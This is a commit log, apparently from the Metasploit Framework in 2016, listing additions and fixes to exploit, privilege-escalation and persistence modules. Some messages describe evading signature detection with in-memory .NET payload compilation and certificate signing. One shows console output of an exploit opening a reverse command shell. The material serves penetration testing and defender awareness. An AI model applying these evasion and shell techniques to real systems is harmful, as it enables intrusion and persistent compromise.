mr_me
bd646ded1b
fixed the check function
2016-10-11 14:06:03 -05:00
mr_me
d8f98ccd4e
run through msftidy
2016-10-10 22:36:20 -05:00
mr_me
f2252bb179
fixed a few things, thanks @h00die
2016-10-10 22:30:01 -05:00
mr_me
3c3f424a4d
added a some references
2016-10-10 17:56:03 -05:00
mr_me
bca3aab1db
added CVE-2016-0752
2016-10-10 17:36:20 -05:00
h00die
9d2355d128
removed debug line
2016-10-10 10:23:51 -04:00
h00die
2ad82ff8e3
more nagios versatility
2016-10-10 10:21:49 -04:00
Pearce Barry
7b84e961ed
Minor output correction.
2016-10-09 19:01:06 -05:00
Pearce Barry
d1a11f46e8
Land #7418 , Linux recvmmsg Priv Esc (CVE-2014-0038)
2016-10-09 18:37:52 -05:00
h00die
7e6facd87f
added wrong file
2016-10-09 09:49:58 -04:00
h00die
2c4a069e32
prepend fork fix
2016-10-09 09:40:44 -04:00
h00die
2dfebe586e
working cve-2014-0038
2016-10-08 23:58:09 -04:00
Brent Cook
b77a910205
Land #7355 , allwinner post to local exploit conversion
2016-10-08 21:38:54 -05:00
wchen-r7
0e57808914
Update to class name MetasploitModule
2016-10-08 14:06:35 -05:00
RageLtMan
f24bfe7d4e
Import Powershell::exec_in_place
...
Allow passing exec_in_place parameter to cmd_psh_payload in order
to execute raw powershell without the commandline wrappers of
comspec or calling the powershell binary itself.
This is useful in contexts such as the web delivery mechanism or
recent powershell sessions as it does not require the creation of
a new PSH instance.
2016-10-08 14:06:35 -05:00
RageLtMan
36b989e6d7
Initial import of .NET compiler and persistence
...
Add Exploit::Powershell::DotNet namespace with compiler and
runtime elevator.
Add compiler modules for payloads and custom .NET code/blocks.
==============
Powershell-based persistence module to compile .NET templates
with MSF payloads into binaries which persist on host.
Templates by @hostess (way back in 2012).
C# templates for simple binaries and a service executable with
its own install wrapper.
==============
Generic .NET compiler post module
Compiles .NET source code to binary on compromised hosts.
Useful for home-grown APT deployment, decoy creation, and other
misdirection or collection activities.
Using mimikatz (kiwi), one can also extract host-resident certs
and use them to sign the generated binary, thus creating a
locally trusted exe which helps with certain defensive measures.
==============
Concept:
Microsoft has graciously included a compiler in every modern
version of Windows. Although executables which can be easily
invoked by the user may not be present on all hosts, the
shared runtime of .NET and Powershell exposes this functionality
to all users with access to Powershell.
This commit provides a way to execute the compiler entirely in
memory, seeking to avoid disk access and the associated forensic
and defensive measures. Resulting .NET assemblies can be run
from memory, or written to disk (with the option of signing
them using a pfx cert on the host). Two basic modules are
provided to showcase the functionality and execution pipeline.
Usage notes:
Binaries generated this way are dynamic by nature and avoid sig
based detection. Heuristics, sandboxing, and other isolation
mechanisms must be defeated by the user for now. Play with
compiler options, included libraries, and runtime environments
for maximum entropy before you hit the temmplates.
Defenders should watch for:
Using this in conjunction with WMI/PS remoting or other MSFT
native distributed execution mechanism can bring malware labs
to their knees with properly crafted templates.
The powershell code to generate the binaries also provides a
convenient method to leave behind complex trojans which are not
yet in binary form, nor will they be until execution (which can
occur strictly in memory avoiding disk access for the final
product).
==============
On responsible disclosure: I've received some heat over the years
for prior work in this arena. Everything here is already public,
and has been in closed PRs in the R7 repo for years. The bad guys
have had this for a while (they do their homework religiously),
defenders need to be made aware of this approach and prepare
themselves to deal with it.
2016-10-08 14:05:53 -05:00
h00die
7c20f20493
remove unneeded bash
2016-10-07 21:12:27 -04:00
Spencer McIntyre
bbdb58eb00
Add an HTA server module using powershell
2016-10-06 19:25:22 -04:00
funkypickle
fb0a438fdf
Perform a version check to determine exploitability for graphite pickle
2016-10-05 16:08:02 -07:00
h00die
27cf5c65c4
working module
2016-10-04 23:21:53 -04:00
h00die
75bea08e0e
changing branches
2016-10-04 21:08:12 -04:00
William Vu
63ed5624ff
Land #7395 , Ninja Forms module update
2016-10-04 11:14:30 -05:00
William Vu
f60d575d62
Add EOF newline back in
2016-10-04 11:14:15 -05:00
OJ
3101564a0a
Enable support for windows 8 in the exploit
2016-10-04 16:27:33 +10:00
OJ
a4efa77878
Support driver list, adjust capcom exploit
...
This commit adds MSF-side support for listing currently loaded drivers
on the machine that Meterpreter is running on. It doesn't add a UI-level
command at this point, as I didn't see the need for it. It is, however,
possible to enumerate drivers on the target using the client API.
Also, the capcom exploit is updated so that it no longer checks for the
existence of the capcom.sys file in a fixed location on disk. Instead,
it enumerates the currently loaded drivers using the new driver listing
function, and if found it checks to make sure the MD5 of the target file
is the same as the one that is expected. The has is used instead of file
version information because the capcom driver doesn't have any version
information in it.
2016-10-04 11:27:20 +10:00
h00die
e6daef62b4
egypt
2016-10-03 20:24:59 -04:00
wchen-r7
b1cb153c31
Make errors more meaningful
2016-10-03 15:29:40 -05:00
h00die
7b0a8784aa
additional doc updates
2016-09-29 19:02:16 -04:00
h00die
bac4a25b2c
compile or nill
2016-09-29 06:15:17 -04:00
h00die
4fac5271ae
slight cleanup
2016-09-29 05:51:13 -04:00
h00die
c036c258a9
cve-2016-4557
2016-09-29 05:23:12 -04:00
h00die
3b548dc3cd
update email and paths
2016-09-28 18:37:48 -04:00
jvoisin
2272e15ca2
Remove some anti-patterns, in the same spirit than #7372
2016-09-29 00:15:01 +02:00
William Vu
988471b860
Land #7372 , useless use of cat fix
...
Obligatory: modules/exploits/linux/local/kloxo_lxsuexec.rb.
2016-09-28 16:37:11 -05:00
William Vu
3033c16da6
Add missing rank
2016-09-28 16:37:04 -05:00
jvoisin
b46073b34a
Replace `cat` with Ruby's `read_file`
...
Thanks to wvu-r7 for the comment
2016-09-28 23:22:19 +02:00
William Vu
45ee59581b
Fix inverted logic in Docker exploit
...
Positive condition should be tested first, imo. Confusing otherwise. My
bad, though.
Credit to @fslavin-r7.
2016-09-28 15:36:09 -05:00
William Vu
ab94bb9cdd
Land #7365 , nonce fix for Ninja Forms exploit
2016-09-28 13:57:08 -05:00
Julien (jvoisin) Voisin
dbb2abeda1
Remove the `cat $FILE | grep $PATTERN` anti-pattern
...
The `kloxo_lxsuexec.rb` and `netfilter_pvi_esc.rb` exploits
were using the infamous `cat+grep` anti-pattern, this commit
replaces it with `cat` and Ruby's `.include?` method.
2016-09-28 13:41:25 +02:00
h00die
35a2b3e59d
working panda
2016-09-27 20:15:17 -04:00
wchen-r7
f838c9990f
Fix nonce bug in wp_ninja_forms_unauthenticated_file_upload
...
If wordpress saves the nonce value in JavaScript, we could get an
undefined method for nil.
2016-09-27 11:30:52 -05:00
OJ
76b3c37262
Fix msftidy errors
2016-09-27 22:56:07 +10:00
OJ
0e82ced082
Add LPE exploit module for the capcom driver flaw
...
This commit includes:
* RDI binary that abuses the SMEP bypass and userland function pointer
invocation that is provided by the driver.
* Related metasploit module.
* Associated make.build to build from command line.
* Updated command line build file.
This also includes the beginnings of a new set of functions that help
with the management/automation of kernel-related work on Windows for
local priv esc exploits.
2016-09-27 22:37:45 +10:00
Pearce Barry
6382fffc75
Land #7326 , Linux Kernel Netfilter Privesc
2016-09-26 12:38:50 -05:00
Adam Cammack
a13e83af8a
Land #7357 , Stagefright CVE-2015-3864
2016-09-25 17:10:06 -05:00
h00die
23e5556a4c
binary drops work!
2016-09-24 21:31:00 -04:00
Joshua J. Drake
dbf66f27d5
Add a browser-based exploit module for CVE-2015-3864
2016-09-23 11:14:31 -05:00
George Papakyriakopoulos
639dee993a
Fixed interactive password prompt issue
...
Fixed an issue where the exploit would drop to interactive password prompt by default on newer ruby version which rendered the exploit unusable. It now properly forces pubkey authentication instead and proceeds with the bypass as expected.
2016-09-23 17:03:40 +01:00
Pearce Barry
5de1d34869
Land #7341 , add module metasploit_static_secret_key_base
2016-09-23 09:20:48 -05:00
h00die
cba297644e
post to local conversion
2016-09-22 22:08:24 -04:00
h00die
7646771dec
refactored for live compile or drop binary
2016-09-22 20:07:07 -04:00
wchen-r7
bc425b0378
Update samsung_security_manager_put
...
This patch improves the following
* Stage 1 XSS/JS attack to use the body.onload callback
* Better timing for FF
2016-09-22 12:02:49 -05:00
Brent Cook
9f3c8c7eee
Land #7268 , add metasploit_webui_console_command_execution post-auth exploit
2016-09-22 00:50:58 -05:00
Brent Cook
88cef32ea4
Land #7339 , SSH module fixes from net:ssh updates
2016-09-22 00:27:32 -05:00
Brendan
04f8f7a0ea
Land #7266 , Add Kaltura Remote PHP Code Execution
2016-09-21 17:14:49 -05:00
Justin Steven
dcfbb9ee6a
Tidy info
...
Replace errant \t with \x20
2016-09-21 20:14:11 +10:00
Justin Steven
1e24568406
Tweak verbosity re: found secrets
2016-09-21 20:14:08 +10:00
Justin Steven
30d07ce0c7
Tidy metasploit_static_secret_key_base module
...
* Inline magic values
* Optimise out dead Rails3-specific code
2016-09-21 20:13:58 +10:00
Louis Sato
8b1d29feef
Land #7304 , fix rails_secret_deserialization popchain
2016-09-20 16:05:03 -05:00
Mehmet Ince
2d3c167b78
Grammar changes again.
2016-09-20 23:51:12 +03:00
Mehmet Ince
0f16393220
Yet another grammar changes
2016-09-20 19:48:40 +03:00
Mehmet Ince
fb00d1c556
Another minor grammer changes
2016-09-20 19:23:28 +03:00
Brendan
251421e4a7
Minor grammar changes
2016-09-20 10:37:39 -05:00
Mehmet Ince
385428684f
Move module and docs under the exploit/linux/http folder
2016-09-20 12:45:23 +03:00
Brent Cook
a9a1146155
fix more ssh option hashes
2016-09-20 01:30:35 -05:00
Mehmet Ince
c689a8fb61
Removing empty lines before module start
2016-09-20 01:42:18 +03:00
Mehmet Ince
29a14f0147
Change References to EDB number and remove 4 space
2016-09-20 01:31:56 +03:00
Justin Steven
a1ca27d491
add module metasploit_static_secret_key_base
2016-09-20 07:04:00 +10:00
David Maloney
e315ec4e73
Merge branch 'master' into bug/7321/fix-ssh-modules
2016-09-19 15:27:37 -05:00
h00die
3bc566a50c
fix email
2016-09-18 20:09:38 -04:00
h00die
edd1704080
reexploit and other docs and edits added
2016-09-18 09:01:41 -04:00
h00die
4f85a1171f
reexploit and other docs and edits added
2016-09-18 08:51:27 -04:00
Mehmet Ince
53d4162e7d
Send payload with POST rather than custom header.
2016-09-17 23:11:16 +03:00
Thao Doan
d2100bfc4e
Land #7301 , Support URIHOST for exim4_dovecot_exec for NAT
2016-09-16 12:49:57 -07:00
Thao Doan
7c396dbf59
Use URIHOST
2016-09-16 12:48:54 -07:00
William Vu
4d0643f4d1
Add missing DefaultTarget to Docker exploit
2016-09-16 13:09:00 -05:00
William Vu
da516cb939
Land #7027 , Docker privesc exploit
2016-09-16 12:44:21 -05:00
William Vu
e3060194c6
Fix formatting in ubiquiti_airos_file_upload
...
Also add :config and :use_agent options.
2016-09-16 12:27:09 -05:00
Jan Mitchell
7393d91bfa
Merge branch 'master' of https://github.com/rapid7/metasploit-framework into upstream-master
2016-09-16 10:46:44 +01:00
h00die
4be4bcf7eb
forgot updates
2016-09-16 02:08:09 -04:00
h00die
2e42e0f091
first commit
2016-09-16 01:54:49 -04:00
William Vu
a7103f2155
Fix missing form inputs
...
Also improve check string.
2016-09-15 19:19:24 -05:00
David Maloney
dfcd5742c1
some more minor fixes
...
some more minor fixes around broken
ssh modules
7321
2016-09-15 14:25:17 -05:00
David Maloney
e10c133eef
fix the exagrid exploit module
...
split the exagrid exploit module up and
refactor to be able to easily tell if the
key or the password was used
7321
2016-09-15 11:44:19 -05:00
Justin Steven
116c754328
tidy Platform
2016-09-15 10:35:42 +10:00
Justin Steven
8a0c8b54fc
merge branch 'master' into PR branch
...
make Travis happy
2016-09-15 10:31:24 +10:00
Jon Hart
a7cf0c8a32
Make at_persistence more persistent
2016-09-14 16:19:59 -07:00
Justin Steven
ff1c839b7d
appease msftidy
...
trailing whitespace
2016-09-15 08:18:43 +10:00
William Webb
01327f0265
Land #7245 , NetBSD mail.local privilege escalation module
2016-09-14 16:07:12 -05:00
William Vu
c6214d9c5e
Fix and clean module
2016-09-14 14:36:29 -05:00
James Lee
27be29edb4
Fix typo
2016-09-14 13:21:37 -05:00
James Barnett
6509b34da1
Land #7255 , Fix issue causing Glassfish to fail uploading to Windows targets.
2016-09-14 12:57:41 -05:00
William Vu
8533e6c5fd
Land #7252 , ARCH_CMD to ARCH_PHP for phoenix_exec
2016-09-14 10:38:37 -05:00
Jon Hart
79a8123d2f
Trim platform, expand payload
2016-09-13 21:44:41 -07:00
Jon Hart
18d424bb83
Update waiting message to indicate that it will wait up to that long
2016-09-13 21:16:59 -07:00
Jon Hart
b16e84f574
Bump default WfsDelay to account for execution at 0s and execution delays
...
Also, platforms, which I think achieves nothing right now.
2016-09-13 21:04:30 -07:00
Jon Hart
18c54ebb5e
Minor rubocop gripe
2016-09-13 20:54:30 -07:00
Jon Hart
15e44e296b
Fix cmd execution; use and cleanup temporary files
2016-09-13 20:51:32 -07:00
Jon Hart
972db476ef
Implement check for at_persistence
2016-09-13 16:08:49 -07:00
Brent Cook
7352029497
first round of SSL damage fixes
2016-09-13 17:42:31 -05:00
wchen-r7
10efafe44e
Land #7306 , Update links and add CVE to WebNMS modules
2016-09-13 15:52:27 -05:00
wchen-r7
ed5bbb9885
Land #7284 , Add SugarCRM REST PHP Object Injection exploit
2016-09-13 15:46:46 -05:00
wchen-r7
a0095ad809
Check res properly and update Ruby syntax
...
If res is nil, it should not be doing res.code
2016-09-13 15:45:57 -05:00
Pedro Ribeiro
8d4ee3fac6
Forgot the bracket!
2016-09-13 19:01:22 +01:00
Pedro Ribeiro
41bdae4b84
update links and CVE on webnms_file_upload
2016-09-13 18:50:25 +01:00
Jon Hart
c69d65c47e
Initial commit of at(1) 'persistence'
...
Initial inspiration from @h00die's cron module in #7003
2016-09-13 10:25:13 -07:00
Justin Steven
17bad7bd4f
fix popchain
...
ERB changed as per <https://github.com/ruby/ruby/commit/e82f4195d4 >
which broke the popchain used for code execution.
2016-09-13 21:25:14 +10:00
nixawk
1ce9aedb97
parenthesis for condition expression
2016-09-13 03:37:47 -05:00
nixawk
fd16c1c3b7
Fix issue-7295
2016-09-13 01:32:20 -05:00
aushack
11342356f8
Support LHOST for metasploit behind NAT
2016-09-13 11:23:49 +10:00
Brent Cook
a81f351cb3
Land #7274 , Remove deprecated modules
2016-09-09 12:01:59 -05:00
Justin Steven
6bafad44f2
drop 'require uri', tweak option text
2016-09-09 20:31:23 +10:00
Justin Steven
0b012c2496
Combine Unix and Windows modules
2016-09-09 20:28:13 +10:00
William Vu
7d44bd5ba4
Clean up module
2016-09-06 23:30:58 -05:00
aushack
015b790295
Added default rport.
2016-09-07 14:24:07 +10:00
catatonic
c06ee991ed
Adding WiFi pineapple command injection via authenticaiton bypass.
2016-09-06 17:22:25 -07:00
catatonic
8d40dddc17
Adding WiFi pineapple preconfig command injection module.
2016-09-06 17:18:36 -07:00
EgiX
df5fdbff41
Add module for KIS-2016-07: SugarCRM REST PHP Object Injection
...
This PR contains a module to exploit KIS-2016-07, a PHP Object Injection vulnerability in SugarCRM CE before version 6.5.24 that allows unauthenticated users to execute arbitrary PHP code with the permissions of the webserver. Successful exploitation of this vulnerability should require SugarCRM to be running on PHP before version 5.6.25 or 7.0.10, which fix CVE-2016-7124.
2016-09-07 01:58:41 +02:00
Quentin Kaiser
e4d118108a
Trend Micro SafeSync exploit.
2016-09-06 19:33:23 +00:00
William Vu
fed2ed444f
Remove deprecated modules
...
psexec_psh is undeprecated because users have been reporting
idiosyncrasies between it and psexec in the field.
2016-09-03 12:43:01 -05:00
Justin Steven
ea220091ea
add metasploit_webui_console_command_execution
...
These modules target the Metasploit Community/Express/Pro Web UI on
Unix and Windows via the diagnostic console feature
2016-09-03 09:12:09 +10:00
Mehmet Ince
ba6c2117cf
Fix msftidy issues
2016-09-02 18:18:43 +03:00
Mehmet Ince
144fb22c32
Add Kaltura PHP Remote Code Execution module
2016-09-02 18:09:53 +03:00
Jan Mitchell
411689aa44
Adding changes to Samba exploit to target MIPSBE (this is for OpenWRT on a router
2016-09-01 10:05:13 +01:00
wchen-r7
445a43bd97
Trim the fat
2016-08-30 15:56:51 -05:00
wchen-r7
1b505b9b67
Fix #7247 , Fix GlassFish on Windows targets
...
Fix #7247
2016-08-30 15:46:08 -05:00
William Vu
7a412031e5
Convert phoenix_exec to ARCH_PHP
2016-08-29 14:14:22 -05:00
William Vu
43a9b2fa26
Fix missing return
...
My bad.
2016-08-29 14:13:18 -05:00
William Vu
d50a6408ea
Fix missed Twitter handle
2016-08-29 13:46:26 -05:00
William Vu
f8fa090ec0
Fix one more missed comma
2016-08-29 13:40:55 -05:00
William Vu
53516d3323
Fix #7220 , phoenix_exec module cleanup
2016-08-29 13:28:15 -05:00
h00die
748c959cba
forgot to save before PR
2016-08-25 21:45:17 -04:00
h00die
5dff01625d
working code
2016-08-25 21:32:25 -04:00
Pearce Barry
226ded8d7e
Land #6921 , Support basic and form auth at the same time
2016-08-25 16:31:26 -05:00
h00die
f2e2cb6a5e
cant transfer file
2016-08-21 19:42:29 -04:00
h00die
6306fa5aa5
Per discussion in #7195 , trying a different route. Currently this compiles, then passes the binary. However, there isn't a reliable binary transfer method at this point, so the rewrite from this point will be to transfer the ascii file, then compile on system (gcc is installed by default I believe)
2016-08-21 19:16:04 -04:00
Jay Turla
ee89b20ab7
remove 'BadChars'
2016-08-19 23:49:11 +08:00
Jay Turla
e3d1f8e97b
Updated the description
2016-08-19 22:22:56 +08:00
Jay Turla
5a4f0cf72f
run msftidy
2016-08-19 21:56:02 +08:00
Jay Turla
c66ea5ff8f
Correcting the date based on the EDB
2016-08-19 21:47:57 +08:00
Jay Turla
d4c82868de
Add Phoenix Exploit Kit Remote Code Execution
...
This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit Remote Code Execution via the geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which then silently installs malware.
```
msf exploit(phoenix_exec) > show options
Module options (exploit/multi/http/phoenix_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.52.128 yes The target address
RPORT 80 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /Phoenix/includes/geoip.php yes The path of geoip.php which is vulnerable to RCE
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.52.129 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Phoenix Exploit Kit / Unix
msf exploit(phoenix_exec) > check
[+] 192.168.52.128:80 The target is vulnerable.
msf exploit(phoenix_exec) > exploit
[*] Started reverse TCP double handler on 192.168.52.129:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RZpbBEP77nS8Dvm4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "RZpbBEP77nS8Dvm4\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 5 opened (192.168.52.129:4444 -> 192.168.52.128:51748) at 2016-08-19 09:29:22 -0400
uname -a
Linux ubuntu 4.4.0-28-generic #47-Ubuntu SMP Fri Jun 24 10:08:35 UTC 2016 i686 i686 i686 GNU/Linux
```
2016-08-19 21:29:55 +08:00
William Webb
3eb3c5afa2
Land #7215 , Fix drupal_coder_exec bugs #7215
2016-08-18 13:43:23 -05:00
William Vu
2b6576b038
Land #7012 , Linux service persistence module
2016-08-17 22:45:35 -05:00
William Vu
c64d91457f
Land #7003 , cron/crontab persistence module
2016-08-17 22:45:16 -05:00
William Vu
4228868c29
Clean up after yourself
...
Can't use FileDropper. :(
2016-08-16 23:09:14 -05:00
William Vu
1f63f8f45b
Don't override payload
...
pl is a cheap replacement.
2016-08-16 23:08:53 -05:00
William Vu
b3402a45f7
Add generic payloads
...
Useful for testing and custom stuff.
2016-08-16 23:08:09 -05:00
William Vu
2fed51bb18
Land #7115 , Drupal CODER exploit
2016-08-15 01:15:23 -05:00
William Vu
62d28f10cb
Clean up Mehmet modules
2016-08-15 01:12:58 -05:00
Brent Cook
d34579f1f0
Land #7203 , Fix struts_default_action_mapper payload request delay
2016-08-12 23:00:44 -05:00
Brent Cook
1733d3e1f1
remove obsolete tested-on comment
2016-08-12 17:26:43 -05:00
Pearce Barry
1e7663c704
Land #7200 , Rex::Ui::Text cleanup
2016-08-12 16:22:55 -05:00
Mehmet Ince
b4846e5793
Enabling cmd_bash payload type with bash-tcp cmd
2016-08-13 00:14:25 +03:00
Mehmet Ince
d38e9f8ceb
Using # instead of ;. Semicolon is causing msg in error.log.
2016-08-12 23:35:29 +03:00
wchen-r7
f4e4a5dcf3
Fix struts_default_action_mapper payload request delay
...
MS-1609
2016-08-12 15:29:00 -05:00
Mehmet Ince
ba79579202
Extending Space limitation up to 250
2016-08-12 22:32:49 +03:00
Brendan
1a7286f625
Land #7062 , Create exploit for WebNMS 5.2 RCE
2016-08-12 07:11:48 -07:00
David Maloney
eb73a6914d
replace old rex::ui::text::table refs
...
everywhere we called the class we have now rewritten it
to use the new namespace
MS-1875
2016-08-10 13:30:09 -05:00
Yorick Koster
b7049939d9
Fixed more build errors
2016-08-09 12:55:18 +02:00
Yorick Koster
22054ce85c
Fixed build errors
2016-08-09 12:47:08 +02:00
Yorick Koster
b935e3df2e
Office OLE Multiple DLL Side Loading Vulnerabilities
...
Multiple DLL side loading vulnerabilities were found in various COM
components.
These issues can be exploited by loading various these components as an
embedded
OLE object. When instantiating a vulnerable object Windows will try to
load one
or more DLLs from the current working directory. If an attacker
convinces the
victim to open a specially crafted (Office) document from a directory
also
containing the attacker's DLL file, it is possible to execute arbitrary
code with
the privileges of the target user. This can potentially result in the
attacker
taking complete control of the affected system.
2016-08-09 12:29:08 +02:00
wchen-r7
c64e1b8fe6
Land #7181 , NUUO NVRmini 2 / Crystal / NETGEAR ReadyNAS Surveillance
2016-08-08 16:04:33 -05:00
wchen-r7
cb04ff48bc
Land #7180 , Add exploit for CVE 2016-5674 / Nuuo / Netgear unauth RCE
2016-08-08 15:55:39 -05:00
wchen-r7
8654baf3dd
Land #6880 , add a module for netcore/netdis udp 53413 backdoor
2016-08-08 15:43:34 -05:00
wchen-r7
f98efb1345
Fix typos
2016-08-08 15:41:03 -05:00
Quentin Kaiser
1320647f31
Exploit for Trend Micro Smart Protection Server (CVE-2016-6267).
2016-08-08 18:47:46 +00:00
wchen-r7
3d1289dac3
Land #7185 , Add VMware Host Guest Client Redirector DLL Hijack Exploit
2016-08-08 11:41:40 -05:00
wchen-r7
51c457dfb3
Update vmhgfs_webdav_dll_sideload
2016-08-08 11:40:03 -05:00
Pedro Ribeiro
3b64b891a6
Update nuuo_nvrmini_unauth_rce.rb
2016-08-05 21:53:25 +01:00
Pedro Ribeiro
746ba4d76c
Add bugtraq reference
2016-08-05 21:53:08 +01:00
Steven Seeley
230903562f
Add Samsung Security Manager 1.5 ActiveMQ Broker exploit
2016-08-05 15:19:22 -05:00
Yorick Koster
dae1679245
Fixed build warnings
2016-08-05 20:40:41 +02:00
Yorick Koster
02e065dae6
Fixed disclosure date format
2016-08-05 20:32:58 +02:00
Yorick Koster
97d11a7041
Exploit module for CVE-2016-5330 VMware Host Guest Client Redirector DLL hijack
2016-08-05 20:19:40 +02:00
Pedro Ribeiro
07e210c143
Add changes requested to target.uri
2016-08-04 17:50:16 +01:00
Pedro Ribeiro
2aca610095
Add github link
2016-08-04 17:38:31 +01:00
Pedro Ribeiro
7d8dc9bc82
Update nuuo_nvrmini_unauth_rce.rb
2016-08-04 17:38:14 +01:00
Pedro Ribeiro
b48518099c
add exploit for CVE 2016-5674
2016-08-04 16:55:21 +01:00
Pedro Ribeiro
0deac80d61
add exploit for CVE 2016-5675
2016-08-04 16:54:38 +01:00
wchen-r7
14a387e4eb
Land #7163 , Add exploit payload delivery via SMB
2016-08-03 14:44:59 -05:00
wchen-r7
2f6e0fb58c
Land #7172 , Add exploit for CVE-2016-0189 (MSIE)
2016-08-03 14:14:16 -05:00
wchen-r7
e16c57ed07
Lower rank
2016-08-03 14:02:47 -05:00
wchen-r7
96dbf627ae
Remove unwanted metadata for HttpServer
2016-08-03 13:55:58 -05:00
William Webb
be4f55aa2f
forgot to update ranking
2016-08-02 13:30:12 -05:00
William Webb
4c15e5e33a
Land #7171 , Hint about incorrect RAILSVERSION
2016-08-01 15:40:27 -05:00
Brent Cook
abf435d6c2
Land #6960 , Auth bypass for Polycom HDX video endpoints
2016-08-01 14:02:50 -05:00
Brent Cook
5309f2e4fb
endpoints, not end points
2016-08-01 14:02:17 -05:00
Brent Cook
b34201e65c
restore session as an instance variable
2016-08-01 13:58:54 -05:00
William Webb
ba0da52274
msftidy cleanup
2016-08-01 13:36:05 -05:00
William Webb
21e6211e8d
add exploit for cve-2016-0189
2016-08-01 13:26:35 -05:00
William Vu
3b13adba70
Hint about incorrect RAILSVERSION
...
If the secret doesn't match, you might have set the wrong RAILSVERSION.
The difference is secret_token (Rails 3) vs. secret_key_base (Rails 4).
2016-08-01 09:36:25 -07:00
James Lee
d46c3a1d8c
Collector looks like hex, store it as a string
2016-07-29 21:57:51 -05:00
Andrew Smith
1d6fa11c4f
Addition of SMB delivery module
2016-07-29 14:58:30 -04:00
wchen-r7
1e1866f583
Fix #7158 , tiki_calendar_exec incorrectly reports successful login
...
Fix #7158
2016-07-28 17:03:31 -05:00
Vex Woo
864989cf6c
For echo command
2016-07-26 20:27:23 -05:00
Brendan
4720d77c3a
Land #6965 , centreon useralias exec
2016-07-26 15:02:36 -07:00
Mehmet Ince
dadafd1fdf
Use data:// instead of bogus web server and check() improvements.
2016-07-26 13:31:46 +03:00
wchen-r7
1016cb675d
Land #7107 , Use VHOST info for redirection in firefox_proto_crmfrequest
2016-07-24 15:50:21 -05:00
wchen-r7
72caeaa72f
Fix redirect url
2016-07-24 15:49:03 -05:00
Mehmet Ince
780e83dabb
Fix for Opt params and Space limits
2016-07-22 20:48:15 +03:00
Mehmet Ince
7e9c5f9011
Fix for double space and indentation
2016-07-21 20:27:52 +03:00
Mehmet Ince
634ee93de4
Add Drupal CODER remote command execution
2016-07-21 20:23:54 +03:00
William Vu
32f1c83c9e
Switch to single quotes
...
Might as well, since we're avoiding escaping.
2016-07-21 00:10:17 -05:00
William Vu
2e631cab5b
Prefer quoting over escaping
...
Having to escape backslashes in a single-quoted string sucks.
2016-07-21 00:02:08 -05:00
William Vu
c6b309d5c9
Fix drupal_restws_exec check method false positive
2016-07-20 23:28:49 -05:00
William Vu
8bd6db8bd7
Land #7108 , Drupal RESTWS exploit
2016-07-20 13:49:37 -05:00
William Vu
b49a847c98
Fix additional things
2016-07-20 13:49:23 -05:00
Mehmet Ince
51bb950201
Avoid return where not required
2016-07-20 21:27:51 +03:00
Mehmet Ince
b0a0544627
Remove random string from URI
2016-07-20 20:50:10 +03:00
Pedro Ribeiro
c93e88f3a3
Make changes requested by wvu-r7
2016-07-20 14:21:04 +02:00
James Lee
b057a9486c
Don't use ssh agent
2016-07-19 17:07:22 -05:00
James Lee
ff63e6e05a
Land #7018 , unvendor net-ssh
2016-07-19 17:06:35 -05:00
Mehmet Ince
089816236d
Remove double spaces and fix checkcode
2016-07-20 00:01:25 +03:00
Mehmet Ince
9c8e351ba8
Use vars_get un send_request_cgi
2016-07-19 20:12:14 +03:00
Mehmet Ince
ec2f8fcc71
Change check method and use meterpreter instead of unix cmd
2016-07-19 11:13:06 +03:00
forzoni
6f35a04e21
Incorporate review fixes, ensure PrependFork is true, fix echo compat.
2016-07-19 01:45:56 -05:00
Mehmet Ince
650034b600
Use normalize_uri params instead of string concatenation
2016-07-19 01:01:05 +03:00
Mehmet Ince
c8deb54938
Add Drupal RESTWS Remote Unauth PHP Code Exec
2016-07-18 21:32:10 +03:00
RageLtMan
14c9569afa
2013-1710 - Use header VHOST info for redirection
...
When this exploit is hit by hostname, the HTTP request contains
a Host header field which does not match the IP-based redirection.
Update the module to check request headers for host information,
and fallback to the prior behavior if none exists.
Tested in conjunction with #6611 DNS spoofer - works great, see
issue #7098 for details.
2016-07-17 04:50:54 -04:00
Brent Cook
b08d1ad8d8
Revert "Land #6812 , remove broken OSVDB references"
...
This reverts commit 2b016e0216
, reversing
changes made to 7b1d9596c7
.
2016-07-15 12:00:31 -05:00
h00die
03dca5fee2
updates round 2
2016-07-15 09:02:23 -04:00
h00die
33ce3ec3ed
fixes round 2
2016-07-15 08:44:39 -04:00
Brendan
8968a6603e
Syntax cleanup
2016-07-14 13:25:31 -07:00
Brendan
927b3a88a1
Changed to one delete
2016-07-14 13:11:59 -07:00
David Maloney
b6b52952f4
set ssh to non-interactive
...
have to set the non-interactive flag so that it does not
prompt the user on an incorrect password
MS-1688
2016-07-14 11:12:03 -05:00
David Maloney
01d0d1702b
Merge branch 'master' into feature/MS-1688/net-ssh-cleanup
2016-07-14 09:48:28 -05:00
William Vu
b2c3267a2a
Land #7042 , fetch_ninja_form_nonce/wponce fix
2016-07-13 11:38:11 -05:00
wchen-r7
8f928c6ca1
Land #7006 , Add MS16-032 Local Priv Esc Exploit
2016-07-12 15:22:35 -05:00
wchen-r7
815c426b4d
Match naming style
2016-07-12 15:18:39 -05:00
wchen-r7
f11b84f106
Update wfsdelay and check for ms16-032
2016-07-12 15:17:21 -05:00
William Vu
f164afaef8
Land #6932 , joomla_contenthistory_sqli_rce fixes
2016-07-12 14:26:49 -05:00
William Vu
310332b521
Clean up module
2016-07-12 11:17:10 -05:00
wchen-r7
b869b890c7
Land #7090 , Add module for Tikiwiki Upload Exec
2016-07-12 11:16:50 -05:00
wchen-r7
2471e8bc8c
Add FileDropper to cleanup properly
2016-07-12 11:16:18 -05:00
William Vu
277950cc79
Land #6733 , psexec StackAdjustment fix
2016-07-12 11:14:16 -05:00
Mehmet Ince
43833c8756
Fixing double normalize function call
2016-07-12 07:30:18 +03:00
Brent Cook
2b016e0216
